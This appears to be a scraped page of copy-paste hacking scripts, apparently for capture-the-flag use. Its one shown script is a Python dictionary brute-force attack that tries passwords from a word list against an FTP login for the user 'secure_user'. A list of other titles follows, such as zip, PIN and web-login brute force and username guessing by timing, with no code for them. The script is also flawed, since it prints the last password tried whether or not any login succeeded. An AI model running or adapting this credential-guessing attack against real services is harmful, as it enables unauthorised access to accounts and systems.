Examples and Quick Scripts
This is a page of quick wins and scripts written to achieve certain goals. Copy/paste parts as needed!
Python
FTP Brute Force
from ftplib import FTP
import time
ftp = FTP()
HOST = 'services.ftp.site'
PORT = 2121
ftp.set_debuglevel(2)
dictionary = 'words.txt'
password = None
with open(dictionary, 'r') as f:
for line in f.readlines():
password = line.strip('\n')
print('trying ' + password)
time.sleep(0.001)
try:
ftp.connect(HOST, PORT)
ftp.login(user='secure_user', passwd=password)
ftp.quit()
except:
pass
print(password)RC4 Brute Force
Zip File Brute Force Guess with B64 Password
Connect to a Website, Establish Session, and Send Data
PIN Brute Force for Web Login
Username Guessing based on Timing Analysis
Connect to Raw Socket and Pass Data
ROT13 Automatic Decoder
Choose Random Numbers
List of all Characters from aa to zz :
aa to zz :Receive POST in Python
Async HTTP Requests
Last updated